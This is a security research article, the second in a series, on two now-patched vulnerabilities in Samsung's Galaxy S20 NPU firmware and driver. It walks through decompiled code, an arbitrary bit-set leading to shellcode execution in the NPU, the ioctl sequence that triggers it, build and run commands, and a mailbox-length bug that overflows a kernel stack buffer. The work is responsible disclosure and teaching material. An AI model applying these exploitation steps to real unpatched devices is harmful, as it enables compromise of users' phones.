Reversing and Exploiting Samsung's NPU (Part 2)

This work was done while we were working at Longterm Security and they have kindly allowed us to release the article on our company's blog.

After an in-depth analysis of the NPU OS and its interaction with the Android kernel, this second part gives a more offensive outlook on this component. We will go through the main attack vectors to target it and detail two vulnerabilities that can be chained together to get code execution in the NPU from the NPU driver before pivoting back into the kernel.

This article is the second part in a series about reversing and exploiting Samsung's Neural Processing Unit. NPUs are generally used to provide dedicated computing power for machine learning and AI-related algorithms. While it could make for an interesting article, if you've read the first part, you know that our primary interest is rather the underlying custom OS Samsung has implemented for its NPU.

Part 1 focused on reverse engineering almost exhaustively what could be considered the kernel of the NPU OS, i.e. all the subsystems related to memory allocation, task scheduling, event handling, etc. While reading it is encouraged to understand this second part, it's not a prerequisite. We will try to provide the necessary context along the way so that you can still follow easily.

In this second part, we will detail two vulnerabilities that were identified while reverse engineering the NPU OS. We will also explain how an exploit can be constructed to trigger a buffer overflow in the Android kernel from a user able to access the NPU driver.

Regarding the disclosure process, these issues have been reported to Samsung and have been patched in their May and June security bulletins under the identifiers SVE-2021-20204 and SVE-2021-21074. The exploits used in this article are tailored for the Samsung Galaxy S20 SM-G980F running the unpatched firmware G980FXXS5CTL5 from January 2021.

Now that we are done with the introduction, let's move on to the analysis of the first vulnerability identified: a limited write to an arbitrary address in the NPU's address space.

Limited Arbitrary Write in the Neural Processing Unit

Communication Between the NPU and the Kernel

As we have explained previously, the NPU is a dedicated chip running its own firmware independently from the Android kernel. In simplified terms, the NPU is a blackbox providing an API that can be queried from the kernel. Inputs are sent to it, ML algorithms do their magic, and the results are sent back.

In the first part of this series, in the section called Interacting with the NPU, we explained how the NPU and the kernel communicate using a system of shared memory and mailboxes. In a nutshell, the kernel starts off by mapping the NPU's shared memory regions using init_iomem_area. It then creates a request for the NPU and writes into the mailbox by calling npu_session_put_nw_req. Once the message is ready to be sent, an interrupt is triggered and the NPU is notified that a new request is waiting in its low priority mailbox.

The task responsible for the low priority mailbox parses the message using mbx_dnward_get and calls the corresponding command handler in mbx_msghub_req. The 9 command handlers implemented in the NPU are defined in init_ncp_handlers.

void init_ncp_handlers(struct ncp_handler_state_t *ncp_handler_state) {
    ncp_handler_state->_unk_0x364 = 4;

    /* Resets messages state */
    for (int i = 0; i < NB_MESSAGES; i++) {
        ncp_handler_state->messages[i].state = RESPONSE_FREE;
    }

    /* Initializes the handlers for the request commands */
    ncp_handler_state->handlers[0] = ncp_manager_load;
    ncp_handler_state->handlers[1] = ncp_manager_unload;
    ncp_handler_state->handlers[2] = ncp_manager_process;
    ncp_handler_state->handlers[3] = profile_control;
    ncp_handler_state->handlers[4] = ncp_manager_purge;
    ncp_handler_state->handlers[5] = ncp_manager_powerdown;
    ncp_handler_state->handlers[6] = ut_main_func;
    ncp_handler_state->handlers[7] = ncp_manager_policy;
    ncp_handler_state->handlers[8] = ncp_manager_end;
}

While pretty succinct, this explanation should give you a rough understanding of where our data are coming from and how to map a request type in the kernel to a command handler in the NPU (e.g. COMMAND_FW_TEST and ut_main_func).
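To make the mapping between a command ID and its handler more concrete, here is a minimal sketch of an index-based dispatch. It is not the NPU's actual code: the handler signature, the stub handlers, the `demo_handlers` table and the `dispatch` function are all hypothetical, and whether the firmware bounds-checks the command ID in this way is an assumption on our part.

```c
#include <stddef.h>
#include <stdint.h>

#define NB_HANDLERS 9

/* Hypothetical handler signature (the real handlers take a struct command **) */
typedef int (*ncp_handler_t)(void *cmd);

/* Stub handlers standing in for ncp_manager_load, ncp_manager_purge and ut_main_func */
static int demo_load(void *cmd)    { (void)cmd; return 0x10; }
static int demo_purge(void *cmd)   { (void)cmd; return 0x14; }
static int demo_fw_test(void *cmd) { (void)cmd; return 0x16; }

/* Same indices as in init_ncp_handlers; unlisted slots are left NULL in this sketch */
static const ncp_handler_t demo_handlers[NB_HANDLERS] = {
    [0] = demo_load,
    [4] = demo_purge,
    [6] = demo_fw_test,
};

/* Looks up the handler for `command` and calls it, or returns -1 if there is none */
static int dispatch(const ncp_handler_t handlers[NB_HANDLERS],
                    uint32_t command, void *cmd)
{
    if (command >= NB_HANDLERS || handlers[command] == NULL)
        return -1;
    return handlers[command](cmd);
}
```

The important property for the rest of the article is that the table holds plain function pointers in writable memory: whoever can alter one entry controls what runs the next time the matching command is received.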

These handlers are the most obvious entry points into the NPU and targets of choice when it comes to vulnerability research. The next section presents a bug in one of those handlers, namely ncp_manager_load.

Vulnerability Details

To perform its tasks, the NPU relies on a system of objects called ncp_object, which are filled with inputs sent by the kernel. They are identified by a number and persist across requests, so that multiple operations can be performed on them if needed. As the names of the command handlers suggest, these operations include loading, unloading or processing an object. In our case, we will be looking at the loading process implemented in ncp_manager_load.

Information sent from the kernel is initially parsed as a struct message, which specifies the command handler ID, the data to process and its length.

struct message {
    u32 magic;
    u32 mid;
    u32 command;
    u32 length;
    u32 self;
    u32 data;
};

The field data points to another structure, namely struct command, and will be passed to the command handlers. The NPU will then be able to retrieve the payload to process as well as other information related to the request in the union c (e.g. object ID, task ID, etc.):

struct command {
    union {
        struct cmd_load     load;
        struct cmd_unload   unload;
        struct cmd_process  process;
        struct cmd_profile_ctl  profile_ctl;
        struct cmd_fw_test  fw_test;
        struct cmd_purge    purge;
        struct cmd_powerdown    powerdown;
        struct cmd_done     done;
        struct cmd_ndone    ndone;
        struct cmd_group_done   gdone;
    } c; /* specific command properties */

    u32 length; /* the size of payload */
    u32 payload;
};

As can be seen in the code snippet below, after performing some sanity checks on the input values, ncp_manager_load calls an initialization handler from g_ncp_object_state.callbacks. If the object we're trying to use is free, the callback used will be ncp_object_load to which we pass the NCP object as well as the initial pointer on the command structure from the kernel.

int ncp_manager_load(struct command **cmd_p) {
    int ret;
    struct ncp_object *obj;
    struct command *cmd = *cmd_p;

    /* Checks if the object ID is not out of bounds */
    if (cmd->c.load.oid >= 8) {
        ret = 0x106;
    }

    /* Checks if the task ID is valid and not out of bounds */
    if (cmd->c.load.tid >= 2 && cmd->c.load.tid != -1) {
        ret = 0x108;
    }

    obj = g_ncp_object_state.objects[cmd->c.load.oid];

    /* Irrelevant object setup */

    /* [...] */

    /*
     * Calls the corresponding initialisation callbacks
     * Depending on the current state of the object, one of those callbacks
     * could be something like ncp_object_load, ncp_object_process, or
     * ncp_object_invalid if we're trying to perform an invalid operation.
     * In any case, when using an object for the first time, assuming
     * memory wasn't tampered with, the function called will be
     * ncp_object_load.
     */
    (*g_ncp_object_state.callbacks[obj->state * 2])(obj, cmd_p);

    /*
     * The rest of the function is not really relevant since it won't
     * interfere with our exploit once the vulnerable function in
     * ncp_object_load returns.
     */

    /* [...] */
}

ncp_object_load checks that the payload pointer and the length are both non-zero. If so, it calls parser_init with a pointer to a field in the ncp_object, the payload address and its length.

int ncp_object_load(struct ncp_object *obj, struct command **cmd_p) {
    int ret;
    struct command *cmd = *cmd_p;

    /* Checks the payload pointer */
    if (cmd->payload) {
        /* Checks the payload length */
        if (cmd->length) {
            /* Parses the payload to fill the NCP object */
            ret = parser_init(
                &obj->ncp_object_copy_ptr, cmd->payload, cmd->length);

            /* [...] */
        }
    }

    /*
     * The rest of the function is not really relevant and won't
     * interfere with our exploit.
     */

    /* [...] */
}

The role of parser_init is central to the loading process: it is responsible for parsing the kernel data stored in cmd->payload and copying them into the corresponding NCP object.

cmd->payload consists of a header followed by the data it references. This header is an ncp_header structure and is given below.

/* ncp_header structure used as header for the payload */
struct ncp_header {
    u32 magic_number1;
    u32 hdr_version;
    u32 hdr_size;
    u32 intrinsic_version;
    u32 net_id;
    u32 unique_id;
    u32 priority;
    u32 flags;
    u32 period;
    u32 workload;
    u32 address_vector_offset;
    u32 address_vector_cnt;
    u32 memory_vector_offset;
    u32 memory_vector_cnt;
    u32 group_vector_offset;
    u32 group_vector_cnt;
    u32 body_version;
    u32 body_offset;
    u32 body_size;
    u32 io_vector_offset;
    u32 io_vector_cnt;
    u32 reserved[10];
    u32 magic_number2;
};

parser_init starts off by performing sanity checks on the header fields to make sure the kernel did not send an invalid or incompatible payload.

int parser_init(struct ncp_object *ncp_object, struct ncp_header *payload, int length) {
    /* Checks the first magic number at the beginning of the structure */
    if (payload->magic_number1 != 0xC0FFEE0)
        return 0x10D;

    /* Checks the second magic number at the end of the structure */
    if (payload->magic_number2 != 0xC0DEC0DE)
        return 0x10E;

    /*
     * Makes sure the header version used by the kernel is the same as
     * the NPU.
     */
    if (payload->hdr_version != 0x16)
        return 0x10F;

    /*
     * Makes sure the intrinsic API version used by the kernel is not
     * older than the one expected by the NPU.
     */
    if (payload->intrinsic_version < 0x15)
        return 0x10F;

    /* Makes sure the payload does not extend outside the heap */
    u32 header_size = length - 0x7C * payload->io_vector_cnt;
    if (header_size >= 0x60000)
        return 0x10B;

    /* [...] */
}

It then allocates memory for the new NCP object and starts copying data into it.

int parser_init(struct ncp_object *ncp_object, struct ncp_header *payload, int length) {
    /*
     * Allocates memory to get a copy of the header from the kernel into
     * the NPU
     */
    struct ncp_header *ncp_header = (struct ncp_header *)malloc(header_size);
    if (!ncp_header)
        return 0x10C;

    /* Copies the header from the payload */
    memcpy(ncp_header, payload, header_size);

    /* NCP object setup ------------------------------------------------ */
    /* Addresses relative to ncp_header */
    ncp_object->ncp_cpy.buffer = ncp_header;
    ncp_object->ncp_cpy.address_vector = \
        ncp_header + ncp_header->address_vector_offset;
    ncp_object->ncp_cpy.memory_vector = \
        ncp_header + ncp_header->memory_vector_offset;
    ncp_object->ncp_cpy.io_vector = \
        ncp_header + ncp_header->io_vector_offset;
    ncp_object->ncp_cpy.group_vector = \
        ncp_header + ncp_header->group_vector_offset;
    ncp_object->ncp_cpy.chunks = ncp_object->chunks;
    ncp_object->ncp_cpy.body = ncp_header + ncp_header->body_offset;

    /* Addresses relative to the payload */
    ncp_object->ncp_src.buffer = payload;
    ncp_object->ncp_src.address_vector = \
        payload + ncp_header->address_vector_offset;
    ncp_object->ncp_src.memory_vector = \
        payload + ncp_header->memory_vector_offset;
    ncp_object->ncp_src.io_vector = \
        payload + ncp_header->io_vector_offset;
    ncp_object->ncp_src.group_vector = \
        payload + ncp_header->group_vector_offset;
    ncp_object->ncp_src.chunks = ncp_object->chunks;
    ncp_object->ncp_src.body = payload + ncp_header->body_offset;

    ncp_object->_unk_48 = 0;
    ncp_object->vector_cnt = ncp_header->group_vector_cnt;
    ncp_object->_unk_54 = 0;
    ncp_object->chunk_cnt = 0;
    ncp_object->header = ncp_header;
    /* ----------------------------------------------------------------- */

    /* [...] */
}

As you can see, some addresses are computed using an offset provided in the payload. While some of those are verified in the kernel, others are left unchecked. In particular, the field group_vector_offset is used as an offset to retrieve an array of group vectors. A rough decompiled version of the code parsing the group vectors is given below.

int parser_init(struct ncp_object *ncp_object, struct ncp_header *payload, int length) {

    /*
     * Computes the group_vector address using the user-controlled
     * value `group_vector_offset` from the ncp header.
     */
    struct group_vector *curr_group_vector;
    struct group_vector *group_vectors = \
        ncp_header + ncp_header->group_vector_offset;

    /* [...] */

    u32 vector_ctr = 0;

    /* If there are vectors to parse... */
    if (ncp_object->vector_cnt) {
        while (1) {
            /*
             * Retrieves the offset and size of the current group vector
             * at offsets 0x18 and 0x1c respectively.
             */
            u32 intrinsic_offset = group_vectors->intrinsic_offset;
            u32 intrinsic_size = group_vectors->intrinsic_size;
            /* The intrinsic offset must be 4-byte aligned */
            if (intrinsic_offset & 3)
                return 0x115;

            struct ncp_chunk* chunk = ncp_object->chunks[chunk_id];
            if (0x7800 - chunk->_unk_08 < intrinsic_size) {
                /* Marks the current group vector as processed */
                if (curr_group_vector) {
                    curr_group_vector->flags |= 8;
                    /* [...] */
                }
            }

            /* [...] */

            /* Moves on to the next group vector */
            curr_group_vector = group_vectors;

            /* If there is no more group vector to parse */
            if (vector_ctr >= ncp_object->vector_cnt)
                goto GROUP_VECTOR_SUCCESS;
        }
    }

    /* [...] */

    /* Marks the last group vector as processed */
    if (curr_group_vector) {
        curr_group_vector->flags |= 8;
        /* [...] */
    }
}

Once parser_init has looped over all group vectors successfully, the 4th bit of group_vector->flags (mask 0x8) will be set for each of them to signify that they are valid. However, since the addresses of all group_vector objects are relative to ncp_header->group_vector_offset, which is user-controlled, it is possible to set the 4th bit of arbitrary bytes in the address space of the NPU. The only limitation is that the value coinciding with group_vectors->intrinsic_offset must be 4-byte aligned. The next section explains how this primitive can be exploited to get arbitrary code execution in the NPU.
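To illustrate what is missing, here is a minimal sketch of the kind of bounds check that would reject an out-of-range group_vector_offset. It is not Samsung's actual patch. The function name `group_vectors_in_bounds` is ours, and `GROUP_VECTOR_SIZE` is an assumption: the article only tells us that the structure is at least 0x20 bytes long, since intrinsic_size sits at offset 0x1c.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed size of one group vector entry (a lower bound, not the real sizeof) */
#define GROUP_VECTOR_SIZE 0x20u

/*
 * Returns true if `group_vector_cnt` entries starting at `group_vector_offset`
 * fit entirely inside a header copy of `header_size` bytes.
 */
static bool group_vectors_in_bounds(uint32_t header_size,
                                    uint32_t group_vector_offset,
                                    uint32_t group_vector_cnt)
{
    /* 64-bit arithmetic so that offset + cnt * size cannot wrap around */
    uint64_t end = (uint64_t)group_vector_offset +
                   (uint64_t)group_vector_cnt * GROUP_VECTOR_SIZE;

    return end <= header_size;
}
```

With such a check, an offset pointing far outside the allocated copy, which is exactly what the exploit relies on, would be refused before any flags field is touched.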


SELinux Context

Before we can start, we need to take a look at the SELinux context to list which components are able to communicate with the NPU.

Samsung's NPU device driver /dev/vertex10 used to be accessible from the untrusted_app SELinux context. However, as can be seen below, access was made more restrictive after Project Zero's disclosure of vulnerabilities affecting this driver.

x1s:/dev # ls -lZ /dev/vertex10
crw-r--r-- 1 system system u:object_r:vendor_npu_device:s0  82,  10 2021-03-16 12:16 /dev/vertex10

This means that in order to communicate with it, we would need a first privilege escalation to get access to the vendor_npu_device SELinux context. On the firmware we analyzed, we can see that there are five contexts able to send ioctls to the NPU driver:

  • hal_camera_default
  • hal_neuralnetworks_eden_drv_default
  • hal_vendor_eden_runtime_default
  • platform_app
  • snap_hidl

lyte@debian:~/tmp$ sesearch --allow s20_selinux_policy | grep vendor_npu_device | grep ioctl
allow hal_camera_default vendor_npu_device:chr_file { ioctl open read write };
allow hal_neuralnetworks_eden_drv_default vendor_npu_device:chr_file { ioctl open read write };
allow hal_vendor_eden_runtime_default vendor_npu_device:chr_file { ioctl open read write };
allow platform_app vendor_npu_device:chr_file { ioctl open read };
allow snap_hidl vendor_npu_device:chr_file { append getattr ioctl lock map open read watch watch_reads write };

And as far as we can tell, this could be achieved by compromising one of the following processes:

x1s:/dev # ps -ZA | grep -e hal_camera_default -e hal_neuralnetworks_eden_drv_default -e hal_vendor_eden_runtime_default -e platform_app -e snap_hidl
u:r:hal_neuralnetworks_eden_drv_default:s0 system 6104  1 11310600 14172 binder_ioctl_write_read 0 S android.hardware.neuralnetworks@1.3-service.eden-drv
u:r:hal_camera_default:s0      cameraserver   6125      1 10958168 11580 binder_ioctl_write_read 0 S
u:r:snap_hidl:s0               system         6132      1 10801344  3728 binder_ioctl_write_read 0 S
u:r:hal_vendor_eden_runtime_default:s0 system 6179      1 11305928 14196 binder_ioctl_write_read 0 S vendor.samsung_slsi.hardware.eden_runtime@1.0-service
u:r:platform_app:s0:c512,c768  u0_a62         6982   6077 16114388 346668 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a151        7532   6077 14853708 226100 ep_poll            0 S
u:r:platform_app:s0:c512,c768  oem_5013       7777   6077 14127536 125892 ep_poll            0 S com.sec.location.nsflp2
u:r:platform_app:s0:c512,c768  u0_a124        8517   6077 14024140 107888 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a213        9226   6077 14832340 147584 ep_poll            0 S
u:r:platform_app:s0:c512,c768  vendor_cmhservice 10115 6077 15057436 135868 ep_poll          0 S
u:r:platform_app:s0:c512,c768  u0_a73        11551   6077 14605848 141736 ep_poll            0 S
u:r:platform_app:s0:c512,c768  vendor_bcmgr  13858   6077 14002784 107068 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a116       16417   6077 14578312 144200 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a230       22542   6077 14119200 136896 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a120       27008   6079 2022612 131968 ep_poll             0 S
u:r:platform_app:s0:c512,c768  u0_a118       27056   6077 14688588 162236 ep_poll            0 S
u:r:platform_app:s0:c512,c768  vendor_cmhservice 28417 6077 14074464 127488 ep_poll          0 S
u:r:platform_app:s0:c512,c768  u0_a183       29598   6079 1993840 101000 ep_poll             0 S
u:r:platform_app:s0:c512,c768  u0_a132       29637   6077 14153028 140804 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a62        29683   6077 14072516 139300 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a62        29701   6077 14577548 142168 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a116       29743   6077 14596868 145088 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a140       29751   6077 14548660 120172 ep_poll            0 S
u:r:platform_app:s0:c512,c768  vendor_sharelive 29784 6077 14185152 140744 ep_poll           0 S
u:r:platform_app:s0:c512,c768  u0_a99        30118   6079 1461684 109072 ep_poll             0 S
u:r:platform_app:s0:c512,c768  u0_a89        30155   6077 14116800 137956 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a93        30174   6077 14857764 150664 ep_poll            0 S
u:r:platform_app:s0:c512,c768  vendor_cmhservice 32195 6077 14684604 163392 ep_poll          0 S

Getting access to one of these processes is not the goal of this article and we will assume that we're already running in an SELinux context allowed to send ioctls to /dev/vertex10.

General Strategy

Writing an exploit for this vulnerability was relatively straightforward, partly because there are few security mitigations used in the NPU. As we can see in the table below, multiple writable sections are not marked as non-executable and, during the initialization of the NPU, the WXN bit is not set in SCTLR. It means that if we are somehow able to inject shellcode into one of the RWX sections and redirect the execution flow to it, we can take control of the NPU.

Type         Virtual Address  Physical Address  Size        PXN  XN  NS  AP                                        B  C  S
Short Desc.  0x00000000       0x50000000        0x0001d000  N    N   N   Writes at PL0 generate Permission faults  Y  Y  N
Short Desc.  0x0001d000       0x5001d000        0x00003000  N    N   N   Writes at PL0 generate Permission faults  Y  Y  N
Short Desc.  0x00020000       0x50020000        0x0000c000  N    N   N   Writes at PL0 generate Permission faults  Y  Y  N
Short Desc.  0x0002c000       0x5002c000        0x00004000  N    N   N   Writes at PL0 generate Permission faults  Y  Y  N
Short Desc.  0x00030000       0x50030000        0x00001000  N    N   N   Writes at PL0 generate Permission faults  Y  Y  N
Short Desc.  0x00031000       0x50031000        0x00002800  N    N   N   Full access                               Y  Y  N
Short Desc.  0x00033800       0x50033800        0x00001000  N    N   N   Full access                               Y  Y  N
Short Desc.  0x00034800       0x50034800        0x00001000  N    N   N   Full access                               Y  Y  N
Short Desc.  0x00035800       0x50035800        0x00001000  N    N   N   Full access                               Y  Y  N
Short Desc.  0x00036800       0x50036800        0x00001000  N    N   N   Full access                               Y  Y  N
Short Desc.  0x00037800       0x50037800        0x00005000  N    N   N   Full access                               Y  Y  N
Short Desc.  0x0003c800       0x5003c800        0x0002b800  N    N   N   Full access                               Y  Y  N
Short Desc.  0x00068000       0x50068000        0x00018000  N    N   N   Full access                               N  N  N
Short Desc.  0x00080000       0x50080000        0x00060000  N    N   N   Full access                               Y  Y  N

As you can imagine, we will be using our bit-setting primitive to alter the execution flow. The only questions that remain are:

  • How can we inject a shellcode into one of the RWX sections?
  • Which value(s) should be altered to redirect the execution to our shellcode?

The answer to the first question is relatively easy. In parser_init, the payload received by the NPU is copied into a buffer allocated using malloc and therefore residing on the heap, which spans the executable region 0x80000-0xe0000. We can place our shellcode at the end of the payload and execute it from the version copied on the heap.

The solution we chose for the second issue was to modify one bit of a function pointer to make it point to our shellcode. Potential candidates for this step include the handlers defined in init_ncp_handlers which were highlighted at the beginning of this article.

All of these handlers are located in the first code section, 0x0-0x1d000. What's convenient here is that setting the 4th bit (mask 0x08) of the byte at offset 2 of a dword stored in little-endian order will transform an address in the code section, like 0x14abc, into 0x80000 | 0x14abc = 0x94abc, which is now on the heap!

For our exploit, we picked the function pointer of ncp_manager_purge, which initially pointed to 0x14C48, and changed it to 0x94C48. Since the payload we send from the kernel can be arbitrarily long (at least long enough to control the area around 0x94C48), we just need to place our shellcode at the correct offset and trigger ncp_manager_purge from the kernel to make the NPU execute our arbitrary instructions. In the next section, we will list the relevant steps to write an exploit and make this possible.
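The arithmetic behind this redirection can be checked with a few lines of C. This is only a sketch: `or_byte_le` and `payload_offset_for` are hypothetical helper names, and the heap address passed to `payload_offset_for` in the usage note is a placeholder, not the value observed on a device.

```c
#include <stdint.h>

/*
 * Returns `value` after OR-ing `mask` into the byte that sits at
 * `byte_index` when the dword is stored in little-endian order
 * (byte 0 holds bits 0-7, byte 2 holds bits 16-23, and so on).
 */
static uint32_t or_byte_le(uint32_t value, unsigned byte_index, uint8_t mask)
{
    return value | ((uint32_t)mask << (8u * byte_index));
}

/*
 * Offset inside the payload at which the shellcode must be placed so that,
 * once the payload has been copied to `heap_copy_addr`, it ends up at
 * `target_addr`.
 */
static uint32_t payload_offset_for(uint32_t target_addr, uint32_t heap_copy_addr)
{
    return target_addr - heap_copy_addr;
}
```

For example, `or_byte_le(0x14C48, 2, 0x08)` yields 0x94C48, the redirected address of ncp_manager_purge. If the heap copy started at a hypothetical 0x90000, `payload_offset_for(0x94C48, 0x90000)` would give 0x4C48 as the position of the shellcode within the payload.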

Writing an Exploit

The exploit we developed for this vulnerability is available here. It starts by allocating and mapping an ION buffer before opening the NPU driver /dev/vertex10.

It then loads the payload we want to execute from "/data/local/tmp/payload.bin". In the Makefile we provide, the payload is compiled from this file and will output a simple "PATCHED_NPU: hello from the NPU!" in dmesg.

The actual exploitation starts with the call to exploit_parser_init_arb_write, which is going to set group_vector_offset to the following out-of-bounds value: NPU_SHUTDOWN_OFFSET + NPU_SHUTDOWN_BYTE_POS - NEXT_MALLOC_ADDR.

  • NPU_SHUTDOWN_OFFSET is the offset of ncp_manager_purge's function pointer.
  • NPU_SHUTDOWN_BYTE_POS is the position of the second byte which also takes into account the offset induced by the flags field in the group_vector object.
  • NEXT_MALLOC_ADDR is the address returned by malloc when it allocates a chunk for the ncp_header copy in parser_init. This value was determined by simply patching the NPU and reading it dynamically (which is possible because there is no signature verification for this binary).
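The computation of the out-of-bounds offset can be sketched as follows. Every number used with these helpers here is a placeholder, not a value from the real exploit, and the position of the flags field inside the group_vector structure (`flags_field_offset`) is an assumption since the article does not give it. The sketch also assumes that the target pointer lives below the heap copy, in which case the offset relies on 32-bit wrap-around.

```c
#include <stdint.h>

/*
 * Computes the group_vector_offset to send so that the flags field of the
 * fake group vector overlaps byte `byte_index` of the pointer at `ptr_addr`.
 */
static uint32_t group_vector_offset_for(uint32_t ptr_addr,
                                        uint32_t byte_index,
                                        uint32_t flags_field_offset,
                                        uint32_t header_copy_addr)
{
    /* Address the fake group vector must start at */
    uint32_t vector_addr = ptr_addr + byte_index - flags_field_offset;

    /* Unsigned subtraction wraps modulo 2^32 if the target is below the copy */
    return vector_addr - header_copy_addr;
}

/* Address of the flags field as seen by parser_init (32-bit arithmetic) */
static uint32_t flags_address(uint32_t header_copy_addr,
                              uint32_t group_vector_offset,
                              uint32_t flags_field_offset)
{
    return header_copy_addr + group_vector_offset + flags_field_offset;
}
```

With a hypothetical pointer at 0x37010, a flags field at offset 4 and a heap copy at 0x90000, the offset comes out as 0xFFFA700E, and adding it back to the heap copy address lands the flags field on 0x37012, the byte at index 2 of the pointer.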

This will place the flags field of our group_vector object over our targeted byte to change the underlying address from 0x14C48 to 0x94C48. exploit_parser_init_arb_write also calls init_ncp_header, which copies the custom payload into the ION buffer that will be sent to the kernel and, ultimately, to the NPU. The rest of the values set in the header are mostly irrelevant and won't be explained in this article.

At this stage, all that remains is to send the data to the NPU. This is achieved by first using the ioctl VS4L_VERTEXIOC_S_GRAPH and then VS4L_VERTEXIOC_S_FORMAT. In the exploit, this logic is implemented in the function do_graph_format_ioctl. VS4L_VERTEXIOC_S_FORMAT will trigger a call to npu_session_NW_CMD_LOAD, which executes ncp_manager_load in the NPU and thus our vulnerable function parser_init that uses our out-of-bounds group_vector_offset. Once this ioctl returns, the NPU will have modified the function pointer of its ncp_manager_purge handler. All that is left to do is to call it.

Before we can proceed, however, we have to meet a few requirements. COMMAND_PURGE is sent to the NPU when performing a STREAMOFF operation. But to call VS4L_VERTEXIOC_STREAM_OFF, we first need to call VS4L_VERTEXIOC_STREAM_ON, and being able to call VS4L_VERTEXIOC_STREAM_ON requires the driver's inqueue and outqueue to be properly configured.

The operations needed to configure these queues are implemented in the functions setup_in_queue and setup_out_queue. They simply send valid requests that specify the directions VS4L_DIRECTION_IN and VS4L_DIRECTION_OUT.

We can now call trigger to make a VS4L_VERTEXIOC_STREAM_ON ioctl followed by a VS4L_VERTEXIOC_STREAM_OFF. If everything went as expected, these calls should succeed and the message "PATCHED_NPU: hello from the NPU!" should appear in dmesg.

If you have an unpatched Samsung Galaxy S20, you can try the exploit by first compiling it using the Android NDK and the Makefile provided.

$ make build
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
    -Tsymbols.ld -fPIC --target=arm-none-eabi -march=armv7a -nostdlib \
    -fpie -ffreestanding -ffunction-sections  -fomit-frame-pointer -o \
    payload.bin payload.c
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android-objcopy \
    -O binary --strip-all payload.bin
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
    -o parser_init parser_init.c

You can then push it on a device and run it.

$ make push
// [...]

$ make run
// [...]
adb wait-for-device shell \
        su root sh -c "/data/local/tmp/parser_init /data/local/tmp/"
[+] Opening /dev/ion
[+] ION allocation
[+] ION buffer mapping
[+] Opening /dev/vertex10
[+] Loading the payload

The following message should appear in dmesg -w:

x1s:/ # dmesg -w | grep "PATCHED_NPU"
[ 5454.496319] [__LOW][0005449.475]PATCHED_NPU: hello from the NPU!

We finally have code execution in the NPU! Now we can have a look at the second vulnerability we identified, which can be leveraged to attack the kernel from the NPU.

Buffer Overflow in Samsung NPU Driver

NPU Mailboxes

In this section, we will give a quick recap of how the NPU mailboxes work. If you want more details, you can head over to the first part of this series. As we have said before, the NPU and the kernel exchange data using a system of mailboxes implemented over shared memory. There are four mailboxes organized according to the format given below:

[Figure: mailbox layout]

A header is used to keep track of the different read/write pointers into the ring buffers. It is defined using the structure struct mailbox_hdr:

struct mailbox_hdr {
    u32 max_slot;
    u32 debug_time;
    u32 debug_code;
    u32 log_level;
    u32 log_dram;
    u32 reserved[8];
    struct mailbox_ctrl h2fctrl[MAILBOX_H2FCTRL_MAX];
    struct mailbox_ctrl f2hctrl[MAILBOX_F2HCTRL_MAX];
    u32 totsize;
    u32 version;
    u32 signature2;
    u32 signature1;
};

When a message arrives or a response is sent, the read/write pointers stored in the mailbox_ctrl structures are updated to reflect the new positions of the cursor inside the ring buffers.

struct mailbox_ctrl {
    u32 sgmt_ofs;
    u32 sgmt_len;
    u32 wptr;
    u32 rptr;
};

An illustration of this process is given below:

[Figure: mailbox ring buffers]

Keep in mind that all values in the mailboxes and the header are shared and can be changed by either the NPU or the Android kernel. As you might expect, this can lead to bugs if one side trusts the other a bit too much, as we will see in the next section.

Vulnerability Details

For this vulnerability, we will be taking a look at the functions retrieving the output of an NPU request. When the NPU is done handling a command, it will write back the result into the response mailbox f2hctrl[0]. Once the result is received, the function nw_rslt_manager is called.

int nw_rslt_manager(int *ret_msgid, struct npu_nw *nw)
{
    int ret;
    struct message msg;
    struct command cmd;

    /* [...] */

    ret = mbx_ipc_get_cmd((void *)interface.addr, &interface.mbox_hdr->f2hctrl[0], &msg, &cmd);

    /* [...] */
}

nw_rslt_manager then calls mbx_ipc_get_cmd with the argument &interface.mbox_hdr->f2hctrl[0], where interface.mbox_hdr points to the shared mailbox header. This function reads the content of the mailbox header, before copying the result of the NPU request into cmd using __copy_command_from_line.

int mbx_ipc_get_cmd(char *underlay, volatile struct mailbox_ctrl *ctrl, struct message *msg, struct command *cmd)
{
    /* [...] */

    /* Reads the values stored in the mailbox header */
    base = underlay - ctrl->sgmt_ofs;
    sgmt_len = ctrl->sgmt_len;
    rptr = ctrl->rptr;
    wptr = ctrl->wptr;

    /* Checks if the readable size in the buffer is bigger than the message size */
    readable_size = __get_readable_size(sgmt_len, wptr, rptr); /* ==> wptr - rptr */
    if (readable_size < msg->length) {
        ret = -EINVAL;
        goto p_err;
    }

    /* Copies the result from the mailbox into `cmd` */
    updated_rptr = __copy_command_from_line(base, sgmt_len, msg->data, cmd, msg->length);

    ctrl->rptr = updated_rptr;

    return ret;
}

static inline u32 __copy_command_from_line(char *base, u32 sgmt_len, u32 rptr, void *cmd, u32 cmd_size)
{
    /* need to reimplement according to user environment */
    memcpy(cmd, base + LINE_TO_SGMT(sgmt_len, rptr), cmd_size);
    return rptr + cmd_size;
}

The only check performed verifies that the readable size in the buffer (i.e. the difference between the write and read pointers) is at least the message size. Afterwards, the function copies msg->length bytes from the mailbox buffer into cmd, a variable defined on the stack in nw_rslt_manager, without ever comparing that length to the size of cmd.

However, since we have code execution in the NPU, we are able to modify the read/write pointer values as well as the size of the incoming message. We could specify, for example, a message with a length of 0x1000 bytes and set the read/write pointers in such a way that the resulting readable size is 0x1100. It would pass the condition on the size, but still write 0x1000 bytes into the 0x10-byte long cmd structure, leading to a buffer overflow once nw_rslt_manager returns.
